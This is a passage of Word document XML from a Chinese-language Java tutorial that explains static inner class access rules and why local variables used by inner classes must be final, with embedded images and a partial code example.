          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>成员变量或者方法</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，这点很好理解，因为在没有外部类的对象的情况下，可以创建静态内部类的对象，如果允许访问外部类的非</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>成员就会产生矛盾，因为外部类的非</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>成员必须依附于具体的对象</w:t>
      </w:r>
      <w:r w:rsidR="00BC40DA">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000372F8" w:rsidRDefault="000372F8" w:rsidP="00117FF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2702495"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="30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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2702495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000372F8" w:rsidRDefault="000372F8" w:rsidP="00117FF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2260419"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="30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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2260419"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000372F8" w:rsidRDefault="000372F8" w:rsidP="00117FF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2518780"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="30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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2518780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC40DA" w:rsidRDefault="00DD4B7A" w:rsidP="00117FF7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidRPr="00C40F39">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>http://www.cnblogs.com/dolphin0520/p/3811445.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="006C6678" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.1.18.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部类访问局部变量需要加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修饰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="320"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这里的局部变量就是在类方法中的变量，能访问方法中变量的类当然也是局部内部类了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>我们都知道，局部变量在所处的函数执行完之后就释放了，但是内部类对象如果还有引用指向的话它是还存在的。例如下面的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Outer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">{                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-function"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-function"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-function"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-params"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(String[] args)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                Outer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Outer();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                Object obj = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.method();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        }   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-function"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-params"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> locvar = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2AA198"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-function"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>displayLocvar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-params"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
